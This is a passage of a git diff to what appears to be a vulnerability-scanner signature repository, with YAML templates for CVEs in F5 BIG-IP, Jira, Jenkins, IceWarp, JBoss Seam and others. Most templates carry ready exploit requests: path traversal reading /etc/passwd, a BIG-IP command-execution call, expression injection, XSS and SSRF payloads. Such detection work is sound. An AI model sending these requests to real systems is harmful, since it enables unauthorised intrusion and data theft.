"8.2.2.107285") || StringSearch("resBody", "8.4.3.111614") || StringSearch("resBody", "8.6.3.116175") || StringSearch("resBody", "8.8.1.118913") || StringSearch("resBody", "9.0.3.124620") || StringSearch("resBody", "9.2.0.127940") || StringSearch("resBody", "9.4.3.137684") || StringSearch("resBody", "9.6.7.145949") || StringSearch("resBody", "9.8.4.149166") || StringSearch("resBody", "19.03.3.152166") || StringSearch("resBody", "19.06.4.157118") || StringSearch("resBody", "19.09.4.0") || StringSearch("resBody", "19.12.2.0") || StringSearch("resBody", "20.03.2.0") || StringSearch("resBody", "20.06.3.0")) + +references: + - https://www.cvebase.com/cve/2020/9047 + diff --git a/cves/f5-bigip-rce-cve-2020-5902.yaml b/cves/f5-bigip-rce-cve-2020-5902.yaml new file mode 100644 index 0000000..092fc01 --- /dev/null +++ b/cves/f5-bigip-rce-cve-2020-5902.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-5902 +info: + name: F5 BIG IP TMUI RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + redirect: false + url: >- + {{.root}}tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") + + - method: GET + redirect: false + url: >- + {{.root}}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + detections: + - >- + StatusCode() == 200 && StringSearch('body', 'output"') && StringSearch('body', '{"error"') + +references: + - https://www.cvebase.com/cve/2020/5902 diff --git a/common/fortigate-xss.yaml b/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml similarity index 61% rename from common/fortigate-xss.yaml rename to cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml index f29bd24..2dd5bf6 100644 --- a/common/fortigate-xss.yaml +++ b/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml @@ -1,6 +1,6 @@ -id: fortigate-xss +id: CVE-2018-13379 info: - name: Fortinet VPN Path Traversal - CVE-2018-13379 + name: Fortinet Fortigate VPN Path Traversal & XSS risk: High params: @@ -16,7 +16,6 @@ requests: detections: - >- StatusCode() == 200 && StringSearch("body", "remote/login") && StringSearch("body", "') references: - - link: https://github.com/prisma-labs/graphql-playground/security/advisories/GHSA-4852-vrh7-28rf \ No newline at end of file + - link: https://github.com/prisma-labs/graphql-playground/security/advisories/GHSA-4852-vrh7-28rf + - https://www.cvebase.com/cve/2020/4038 \ No newline at end of file diff --git a/cves/harboar-cve-2019-16097.yaml b/cves/harbor-missing-authorization-cve-2019-16097.yaml similarity index 75% rename from cves/harboar-cve-2019-16097.yaml rename to cves/harbor-missing-authorization-cve-2019-16097.yaml index f490d87..dbcdae6 100644 --- a/cves/harboar-cve-2019-16097.yaml +++ b/cves/harbor-missing-authorization-cve-2019-16097.yaml @@ -1,7 +1,6 @@ -# info to search signature -id: harbor-cve-01 +id: CVE-2019-16097 info: - name: Harbor privilege-escalation CVE-2019-16097 + name: Harbor Missing Authorization risk: High params: @@ -24,4 +23,4 @@ requests: StringSearch("response", "username has already") reference: - - link: https://nsfocusglobal.com/harbor-remote-privilege-escalation-vulnerability-cve-2019-16097-threat-alert/ \ No newline at end of file + - https://www.cvebase.com/cve/2019/16097 \ No newline at end of file diff --git a/cves/icewarp-lfi-cve-2019-12593.yaml b/cves/icewarp-lfi-cve-2019-12593.yaml new file mode 100644 index 0000000..5ba035e --- /dev/null +++ b/cves/icewarp-lfi-cve-2019-12593.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-12593 +info: + name: IceWarp LFI + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + webmail/calendar/minimizer/index.php +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "[intl]") + - method: GET + url: >- + {{.root}}{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2019/12593 diff --git a/cves/icewarp-webmail-xss-cve-2020-8512.yaml b/cves/icewarp-webmail-xss-cve-2020-8512.yaml new file mode 100644 index 0000000..cb0ddf7 --- /dev/null +++ b/cves/icewarp-webmail-xss-cve-2020-8512.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-8512 +info: + name: IceWarp WebMail XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: GET + url: >- + {{.root}}webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") + +references: + - https://www.cvebase.com/cve/2020/8512 diff --git a/cves/imind-server-info-leak-cve-2020-24765.yaml b/cves/imind-server-info-leak-cve-2020-24765.yaml new file mode 100644 index 0000000..0c1902b --- /dev/null +++ b/cves/imind-server-info-leak-cve-2020-24765.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-24765 +info: + name: iMind Server Information Leak + risk: High + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + url: >- + {{.root}}api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1 + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", 'This message is too large to display') + +references: + - https://www.cvebase.com/cve/2020/24765 diff --git a/cves/infinitewp-improper-authentication-cve-2020-8772.yaml b/cves/infinitewp-improper-authentication-cve-2020-8772.yaml new file mode 100644 index 0000000..877aac2 --- /dev/null +++ b/cves/infinitewp-improper-authentication-cve-2020-8772.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-8772 +info: + name: InfiniteWP Improper Authentication + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: POST + url: >- + {{.root}}wp-admin/ + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ== + detections: + - >- + StringSearch("resHeaders", "IWPHEADER") + +references: + - https://www.cvebase.com/cve/2020/8772 diff --git a/cves/jboss-seam-code-execution-cve-2010-1871.yaml b/cves/jboss-seam-code-execution-cve-2010-1871.yaml new file mode 100644 index 0000000..850650e --- /dev/null +++ b/cves/jboss-seam-code-execution-cve-2010-1871.yaml @@ -0,0 +1,23 @@ +id: CVE-2010-1871 +info: + name: JBoss Seam 2 Code Execution + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + seam-booking/home.seam +requests: + - method: GET + redirect: false + url: >- + {{.root}}{{.endpoint}}?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName(%27java.lang.Runtime%27).getDeclaredMethods()[7]} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 302 && StringSearch("resHeader", "pwn.seam") && StringSearch("resHeader", "?pwned=") +references: + - https://www.cvebase.com/cve/2010/1871 diff --git a/cves/jenkins-audit-xss.yaml b/cves/jenkins-audit-xss.yaml deleted file mode 100644 index be00aa3..0000000 --- a/cves/jenkins-audit-xss.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: jenkins-audit-xss -info: - name: Jenkin Audit XSS (CVE-2020-2140) - risk: Medium - -params: - - root: "{{.BaseURL}}" - -variables: - - file: | - / - /jenkins/ -requests: - - method: GET - redirect: false - url: >- - {{.root}}{{.file}}descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "

sample") && StringSearch("response", "regular expression") - -reference: - - link: https://github.com/jenkinsci/audit-trail-plugin/commit/40c6d621a03e6a50b291dca7188d07d0aa3de946 diff --git a/cves/jenkins-gitlab-xss-cve-2020-2096.yaml b/cves/jenkins-gitlab-xss-cve-2020-2096.yaml new file mode 100644 index 0000000..a886c56 --- /dev/null +++ b/cves/jenkins-gitlab-xss-cve-2020-2096.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-2096 +info: + name: Jenkins Gitlab Hook XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + gitlab/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}build_now%3Csvg/onload=alert(1337)%3E + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") +references: + - https://www.cvebase.com/cve/2020/2096 diff --git a/cves/jenkins-gitlab-xss.yaml b/cves/jenkins-gitlab-xss.yaml deleted file mode 100644 index 2febafa..0000000 --- a/cves/jenkins-gitlab-xss.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: jenkins-xss-01 -info: - name: Jenkins Gitlab XSS - CVE-2020-2096 - risk: Medium - -variables: - - prefix: | - / - /jenkins/ - -requests: - - method: GET - redirect: true - url: >- - {{.BaseURL}}{{.prefix}}gitlab/build_now/a'"> - detections: - - >- - StringSearch("response", "know how to process") || StringSearch("response", "See https://github.com/elvanja/jenkins-gitlab-hook-plugin for details") - - >- - StatusCode() == 200 && StringSearch("response", "Gitlab Web Hook") - - method: GET - redirect: true - url: >- - {{.BaseURL}}{{.prefix}}git/build_now/a'"> - detections: - - >- - StringSearch("response", "know how to process") || StringSearch("response", "See https://github.com/elvanja/jenkins-gitlab-hook-plugin for details") - - >- - StatusCode() == 200 && StringSearch("response", "Gitlab Web Hook") - -reference: - author: j3ssie - link: https://jenkins.io/security/advisory/2020-01-15/ \ No newline at end of file diff --git a/cves/jenkins-xss-cve-2019-10475.yaml b/cves/jenkins-xss-cve-2019-10475.yaml new file mode 100644 index 0000000..0c67572 --- /dev/null +++ b/cves/jenkins-xss-cve-2019-10475.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-10475 +info: + name: Jenkins Build Metrics XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + plugin/build-metrics/getBuildStats + jenkins/plugin/build-metrics/getBuildStats +requests: + - method: GET + redirect: true + url: >- + {{.root}}{{.endpoint}}?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") + - method: GET + redirect: true + url: >- + {{.BaseURL}}{{.endpoint}}?label=reallylongtring + detections: + - >- + StatusCode() == 200 && StringSearch("response", "reallylongtring") + - method: GET + redirect: true + url: >- + {{.BaseURL}}{{.endpoint}}?label=reallylongtring + detections: + - >- + StatusCode() == 200 && StringSearch("response", "reallylongtring") +references: + - https://www.cvebase.com/cve/2019/10475 diff --git a/cves/jenkins-xss-cve-2020-2140.yaml b/cves/jenkins-xss-cve-2020-2140.yaml new file mode 100644 index 0000000..bb3f180 --- /dev/null +++ b/cves/jenkins-xss-cve-2020-2140.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-2140 +info: + name: Jenkins Audit Trail XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + descriptorByName/AuditTrailPlugin/regexCheck + jenkins/descriptorByName/AuditTrailPlugin/regexCheck +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?value=*j%3Ch1%3Esample + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "

sample") +references: + - https://www.cvebase.com/cve/2020/2140 diff --git a/cves/jenkins-subversion-xss.yaml b/cves/jenkins-xss-cve-2020-2199.yaml similarity index 64% rename from cves/jenkins-subversion-xss.yaml rename to cves/jenkins-xss-cve-2020-2199.yaml index 4869fa3..3771a94 100644 --- a/cves/jenkins-subversion-xss.yaml +++ b/cves/jenkins-xss-cve-2020-2199.yaml @@ -1,6 +1,6 @@ -id: jenkins-subversion-xss +id: CVE-2020-2199 info: - name: Jenkin Subversion Partial XSS (CVE-2020-2199) + name: Jenkins Subversion Partial Release Manager XSS risk: Medium params: @@ -21,6 +21,5 @@ requests: - >- StatusCode() == 200 && StringSearch("response", "java.lang.") && StringSearch("response", 'For input string: "zie"') -reference: - - link: https://www.jenkins.io/security/advisory/2020-06-03/ - - realPOC: http://{{.BaseURL}}/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://xx:%3Csvg/onload=alert(document.domain)%3E +references: + - https://www.cvebase.com/cve/2020/2199 \ No newline at end of file diff --git a/cves/jenkins-xss.yaml b/cves/jenkins-xss.yaml deleted file mode 100644 index d3b13cf..0000000 --- a/cves/jenkins-xss.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: cve-jenkins-01 -info: - name: Jenkins XSS - -requests: - - method: GET - redirect: true - url: >- - {{.BaseURL}}/plugin/build-metrics/getBuildStats?label=reallylongtring - detections: - - >- - StatusCode() == 200 && StringSearch("response", "reallylongtring") - - method: GET - redirect: true - url: >- - {{.BaseURL}}/jenkins/plugin/build-metrics/getBuildStats?label=reallylongtring - detections: - - >- - StatusCode() == 200 && StringSearch("response", "reallylongtring") - - method: GET - redirect: true - url: >- - {{.BaseURL}}/plugin/build-metrics/getBuildStats?label=&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search - detections: - - >- - StatusCode() == 200 && StringSearch("response", "onload=prompt") - - diff --git a/cves/jira-improper-authorization-cve-2019-8446.yaml b/cves/jira-improper-authorization-cve-2019-8446.yaml new file mode 100644 index 0000000..8a64643 --- /dev/null +++ b/cves/jira-improper-authorization-cve-2019-8446.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-8446 +info: + name: Jira Improper Authorization + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + rest/issueNav/1/issueTable +requests: + - method: POST + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Connection: Close + - Sec-Fetch-User: ?1 + - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 + - Sec-Fetch-Site: none + - Sec-Fetch-Mode: navigate + - X-Atlassian-Token: no-check + - Accept-Encoding: gzip, deflate + - Accept-Language: en-US,en;q=0.9 + body: {'jql':'project in projectsLeadByUser("g147isalive")'} + detections: + - >- + StringSearch("resBody", "the user does not exist") + +references: + - https://www.cvebase.com/cve/2019/8446 diff --git a/cves/jira-info-leak-cve-2019-8449.yaml b/cves/jira-info-leak-cve-2019-8449.yaml new file mode 100644 index 0000000..1573ebf --- /dev/null +++ b/cves/jira-info-leak-cve-2019-8449.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-8449 +info: + name: Jira Information Leak + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + rest/api/latest/groupuserpicker +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?query=1&maxResults=50000&showAvatar=true + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", '{"users":{"users":') +references: + - https://www.cvebase.com/cve/2019/8449 diff --git a/cves/jira-info-leak-cve-2020-14179.yaml b/cves/jira-info-leak-cve-2020-14179.yaml new file mode 100644 index 0000000..e803303 --- /dev/null +++ b/cves/jira-info-leak-cve-2020-14179.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-14179 +info: + name: Jira Information Leak + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + secure/QueryComponent +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}!Default.jspa + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Referer: "{{.root}}/webadmin/admin/service_manager_data.php" + detections: + - >- + StatusCode() == 200 && (StringSearch("resBody", "searchers") || StringSearch("resBody", "groups") + +references: + - https://www.cvebase.com/cve/2020/14179 diff --git a/cves/jira-lfi.yaml b/cves/jira-lfi.yaml deleted file mode 100644 index 003be10..0000000 --- a/cves/jira-lfi.yaml +++ /dev/null @@ -1,31 +0,0 @@ -# info to search signature -id: cve-jira-01 -info: - name: Confluence LFI CVE-2019-3396 - -requests: - - method: POST - redirect: false - url: >- - {{.BaseURL}}/rest/tinymce/1/macro/preview - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 - - Accept: text/plain, */*; q=0.01 - - Content-Type: application/json - - X-Requested-With: XMLHttpRequest - - Referer: "{{.URL}}" - - Connection: keep-alive - body: >- - {"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}} - - detections: - - >- - StatusCode() == 200 && StringSearch("response", "root:x:0:0:root") && StringSearch("response", "root:x:0:0:root") - - >- - StatusCode() == 200 && StringSearch("response", "/bin/bash") - -# [optional] just reference info -reference: - author: whatever - links: - - https://example.com \ No newline at end of file diff --git a/cves/jira-path-traversal-cve-2019-8442.yaml b/cves/jira-path-traversal-cve-2019-8442.yaml new file mode 100644 index 0000000..768da07 --- /dev/null +++ b/cves/jira-path-traversal-cve-2019-8442.yaml @@ -0,0 +1,23 @@ +id: CVE-2019-8442 +info: + name: Jira Webroot Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml + s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StringSearch("resBody", "artifactId") +references: + - https://www.cvebase.com/cve/2019/8442 diff --git a/cves/jira-ssrf-cve-2017-9506.yaml b/cves/jira-ssrf-cve-2017-9506.yaml new file mode 100644 index 0000000..38134a7 --- /dev/null +++ b/cves/jira-ssrf-cve-2017-9506.yaml @@ -0,0 +1,22 @@ +id: CVE-2017-9506 +info: + name: Jira SSRF + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + plugins/servlet/oauth/users/icon-uri +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?consumerUri=https://ipinfo.io/json + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StringSearch("resBody", "ipinfo.io/missingauth") +references: + - https://www.cvebase.com/cve/2017/9506 diff --git a/cves/jira-ssrf-cve-2019-8451.yaml b/cves/jira-ssrf-cve-2019-8451.yaml new file mode 100644 index 0000000..99e491f --- /dev/null +++ b/cves/jira-ssrf-cve-2019-8451.yaml @@ -0,0 +1,23 @@ +id: CVE-2019-8451 +info: + name: Jira SSRF + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + plugins/servlet/gadgets/makeRequest +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?url=https://{{Hostname}}:1337@example.com + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - X-Atlassian-token: no-check + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", '

This domain is for use in illustrative examples in documents.') +references: + - https://www.cvebase.com/cve/2019/8451 diff --git a/cves/jira-ssrf.yaml b/cves/jira-ssrf.yaml deleted file mode 100644 index 4f8731b..0000000 --- a/cves/jira-ssrf.yaml +++ /dev/null @@ -1,31 +0,0 @@ -# info to search signature -id: cve-jira-02 -type: list -info: - name: Jira SSRF CVE-2019-8451 - risk: Medium - -variables: - - jira: | - / - /jira/ - /wiki/ - /confluence/ - - ssrf: | - google.com - example.com - -requests: - - method: GET - redirect: true - url: >- - {{.BaseURL}}{{.jira}}plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@{{.ssrf}} - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 - - X-Atlassian-Token: no-check - detections: - - >- - StatusCode() == 200 && StringSearch("response", '{"rc":200') - -reference: - - link: https://jira.atlassian.com/browse/JRASERVER-70018 \ No newline at end of file diff --git a/cves/jira-ssti-cve-2019-11581.yaml b/cves/jira-ssti-cve-2019-11581.yaml new file mode 100644 index 0000000..49c4cd9 --- /dev/null +++ b/cves/jira-ssti-cve-2019-11581.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-11581 +info: + name: Jira SSTI + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + secure/ContactAdministrators +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}!default.jspa + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "Contact Site Administrators") && StringSearch("resBody", "Request details") +references: + - https://www.cvebase.com/cve/2019/11581 diff --git a/cves/jira-user-enumeration-cve-2020-14181.yaml b/cves/jira-user-enumeration-cve-2020-14181.yaml new file mode 100644 index 0000000..5d467f9 --- /dev/null +++ b/cves/jira-user-enumeration-cve-2020-14181.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-14181 +info: + name: Jira User Enumeration + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + secure/ViewUserHover.jspa +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "User does not exist") + +references: + - https://www.cvebase.com/cve/2020/14181 diff --git a/cves/jira-xss-cve-2018-20824.yaml b/cves/jira-xss-cve-2018-20824.yaml new file mode 100644 index 0000000..4ab7d41 --- /dev/null +++ b/cves/jira-xss-cve-2018-20824.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-20824 +info: + name: Atlassian Jira XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + plugins/servlet/Wallboard/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "(?mi)timeout:\salert\(document\.domain\)") +references: + - https://www.cvebase.com/cve/2018/20824 diff --git a/cves/jira-xss-cve-2020-9344.yaml b/cves/jira-xss-cve-2020-9344.yaml new file mode 100644 index 0000000..fbd87b5 --- /dev/null +++ b/cves/jira-xss-cve-2020-9344.yaml @@ -0,0 +1,49 @@ +id: CVE-2020-9344 +info: + name: Jira Subversion ALM XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + + +requests: + - method: GET + url: >- + {{.root}}plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") + - method: GET + url: >- + {{.root}}plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") + - method: GET + url: >- + {{.root}}plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") + - method: GET + url: >- + {{.root}}plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") + +references: + - https://www.cvebase.com/cve/2020/9344 diff --git a/cves/jolokia-xss-cve-2018-1000129.yaml b/cves/jolokia-xss-cve-2018-1000129.yaml new file mode 100644 index 0000000..89af44e --- /dev/null +++ b/cves/jolokia-xss-cve-2018-1000129.yaml @@ -0,0 +1,23 @@ +id: CVE-2018-1000129 +info: + name: Jolokia XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + jolokia/ + 